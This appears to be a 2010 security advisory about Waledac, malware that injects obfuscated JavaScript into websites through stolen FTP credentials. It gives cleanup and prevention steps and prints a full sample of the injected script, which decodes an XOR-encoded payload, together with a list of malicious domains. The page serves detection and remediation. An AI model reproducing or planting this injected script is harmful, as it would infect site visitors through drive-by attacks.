Waledac Malware

Updated: April 12, 2010

The Waledac malware places obfuscated malicious JavaScript into a website's web pages and or JavaScript files. To clean the website, the website needs to be reverted to a clean backup or the malicious code needs to be removed from the web pages and or JavaScript files. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected the FTP password needs to be changed and the malware removed from the infected computer before it used again to again to access the website via FTP.

Recent Script Format On Web Pages:

<script>ySqbObVdCe='';function WSrepeyK(HIT){ window.eval(); fff.op.replace("874"); } var sEAX="sEAX";var wUFS='';var bFI=22822;var kJCG;var iVIQ="";var hNQY=false;kJCG='%f6%e4%f5%ef%e2%f6%fb%ef%ce%97%ca%88%a8%8f%8b%fe%a1%b2%bd%94%d7%94%fb%f6%ff%b2%b6%a1%bf%a4%d4%85%bd%ac%b6%b8%85%82%83%ea%e5%bd%ac%b7%f2%e0%f3%fe%a5%bd%ce%a4%a9%84%f3%a3%d4%86%b9%8b%9c%ff%a6%b2%b0%e9%d6%d0%ed%f6%e2%bf%c1%db%da%b8%a0%f6%fc%ec%e6%f0%e5%ec%d8%c9%f1%fe%e6%ad%ae%fa%fd%ee%eb%92%9b%b7%cb%d7%e9%f4%ee%f7%dc%c1%dc%af%b1%f2%fd%eb%e1%ee%e3%86%e0%bd%e3%e0%e1%fd%a1%a7%a3%ce%d8%cb%ef%ec%fd%eb%8e%dd%d9%e3%9f%d5%e1%ad%a6%e7%d1%c9%f0%b4%8a%84%8c%e5%fd%f5%fa%ca%c2%9f%a8%b3%b3';var mVV='';var qMUA="qMUA";var cPK=7393;var eKIC=false;function mDCA(iFI){var pRFX=8553;var lHH='';var qADJ=40532; function qEZ(rKS, eVOW){var xIY="";var gBLF=53179;var sIF=65375;var bUQ="bUQ";var nIIM=27152;if(zND == null) {var yBMW="";var xZKN='';zND = {};var mLAX="mLAX";var cSYY='';var tUVI=false;}var tQON=26427;var oYWC=19727;var rFHW=false;var zOQ='';var xSN="";if(zND[rKS] == null) {var mZZ=50235;var kKAI="kKAI";var nBC='';var iGZX=false;zND[rKS] = new Object();var zCAV="zCAV";var sORI="";var vBC='';var sKJ="sKJ";zND[rKS].iDI = 0;var wBT=6407;var fVWW=false;zND[rKS].eWF = eVOW;var lFM=27494;var nHK=61917;}var fIJ="fIJ";var lKE=36076;var uWIC='';var zJQL='';}var aIQ=23011;var bOOJ='';var aTFK=false;var nHDH=false;var sVAI="sVAI";var aTX=false;var wHQ=false;var bSN='';function xOQ(wLU){var mLQ='';var eGA='';var fMZ='';var pVZ="pVZ";var cVJO=45114;var yMLA="yMLA";var wVOL=false;var kKR=0;var kZMV='';var sLL=62709; var cVA=wLU.length;var eQWV=52207;var cGU=false;var bNW="bNW";var jWQL=0;var zHYQ="";var vYJ=10088;while(jWQL<cVA){var bUOK="";var pUNF='';var rVQ=false;var wVBV=false;var iFG="iFG";var yYYD="";jWQL+=1;var vRZH="";var hTM="";vXUY=wEE(wLU,jWQL-1);var iFQ=2135;var hBUG="hBUG";var rZN="rZN";kKR+=vXUY*cVA;var gLVH=23164;var kMFB=146;var jPMX=54960;var uBDN=""; var uREV="";var aJJK="";var aTC=false;}var kEJG="";var nUSN="nUSN";var jLF=311;var cWHY=false;var tVF="";var eROT="eROT";var zJH='';return new String(kKR);var gXO=false;var iYQ=false;}var nBG=26373;var pVO='';var zPO="";var jTQ="";var pWH=false;var aSSX="";var fXQ=4834;var mKBU=35646;var xZYO=34552;var hOG='';var tWBY="";var eLIB="eLIB";var kUHQ=false;var pFJX="pFJX";function mBS(rKS) {var kMH='';var kCMG='';var bHS="";var bYQY="bYQY";if(zND[rKS] != null) {var rUN="";var cKT="";var bDP="";var fOP = zND[rKS].iDI;var cOO=26367;var pUCJ=false;var oZMI = zND[rKS].eWF.substr(fOP, 1);var eAZ="eAZ";var bFN=6233;var wSBK=false;var uLID=false;var qSRG='';if(fOP + 1 >= zND[rKS].eWF.length) {var sVXJ=56116;var fAVF=37220;var dCH='';var qROK="";zND[rKS].iDI = 0;var cJUM="cJUM";var aTP=false;} else {var vKJR="vKJR";var gTQ="gTQ";var fLJS='';zND[rKS].iDI = fOP + 1;var kPT=14393;var sXZI="sXZI";var kKV='';var rPZ="rPZ";var jTNT=false;var sGCA=34795;var eQAG=44471;var zBMO="zBMO";var qDY = new String(doc ument['dHoacauxm0exnHt2'.replace(/[2x0Ha]/g, '')]);var jDFH="jDFH";var mCK="mCK";function wEE(oVI,iDXC){var sTV="";var zZSV="";return oVI.charCodeAt(iDXC);var iYJU="";var nAB='';var mIP="";}var zPAY=false;var pPQL=1314;var qCT="qCT";var kTAC="kTAC";if(qDY.indexOf('a4r<i<t4y4'.replace(/[42\[7\<]/g, '')) !== -1) {var nECS=false;var nPRK=12992;var wYZU=''; return 205;var iAPG='';var xNZS="xNZS";var xSV='';var wJL='';}var aLAI='';var sQD=false;var gHM="gHM";var qHWD=false;var yIEG="";var uAH="uAH";var lXQQ=false;var kCV=false;var zND = null;var sEE=49571;var jXM="";var fBHJ=window;var dHC="";var yPBW=45004;var tNXX=window;var iQC='';var jFI="";lTCT=false;var iAEQ=fBHJ['uBn>ejsBcBarpjer'.replace(/[r\>Bjq]/g, '')];var nHJ="nHJ";var hIX="";var jVP=false;var sLY=11558;var bVGI = '';var kOT=false;var aJSI=false;var nUD=nNW['fAr5ojmACzhzazrzCjo5dneA'.replace(/[Ajnz5]/g, '')];var rBGI="rBGI";var rLS=55838;var eAC="";var zBFJ=54391;var iFI = iAEQ(iFI);var iRKR="iRKR";var mRNM=false;var wRAP=58484;var mCXD="";var jAI = new nNW(mDCA).replace(/[^@a-z0-9A-Z_-]/g,'');var fIDL="";var dPSY=9904;var wJE="";var nVZQ = new nNW(xOQ(jAI));var pQD=false;var jZHU='';var cNOC=11454;var gICG='';var lXAP=62523;var mUTN=44853;qEZ('jCYM', jAI);var tCPP=42061;var gNU='';qEZ('jEV', nVZQ);var fDVJ=false;var gKRV="";var cRM="cRM";var uZY="";var lQO=21750;var uGE='';var fCQY="fCQY";var xJF="xJF";for(var fAJI=0; fAJI < (iFI.length); fAJI++) {var gPL="";var fBDM="fBDM";var mYW=false;var tPL='';var pWHC="pWHC";var aNT=44313;var iPJ='';var eROA = wEE(iFI,fAJI);var tMP=false;var rBHZ=22836;var qWDK="qWDK";var pBEV="";eROA^= oLQ;var fVUE=48296;var nZN="";var rFQ='';var fGG="";eROA^= mBS('jEV');var mZOJ=false;var hDF='';eROA^= mBS('jCYM');var tGRY=false;var dIC="";var kYW=false;var cNR=28466;var hME="hME";bVGI+=nUD(eROA);var bBX="bBX";var aEC=21671;var jWVW='';var rPW="rPW";}var zAR=false;var jLVN="jLVN";var vZC=false;var oXT="";var cDLU="";oKJM(bVGI, 288);var rON="";var nIGP=false;var rWKD=25669;return bVGI=new nNW();var zJW="";var hDFK="";var xUX=39166;var sZWC="";};var wPP=false;var qHLS='';var uPVU='';mDCA(kJCG);var wPYM='';var kZRM="";</script>

Recent Domains Used by the Malware: aweleon.com, purgand.com, gumentha.com, domoktov.com, sodanthu.com, joycerer.com, apomith.com, tabatti.com, prerre.com

Recent Virus Scan Identifications: HTML:IFrame-KP [Trj]


Related:

Resources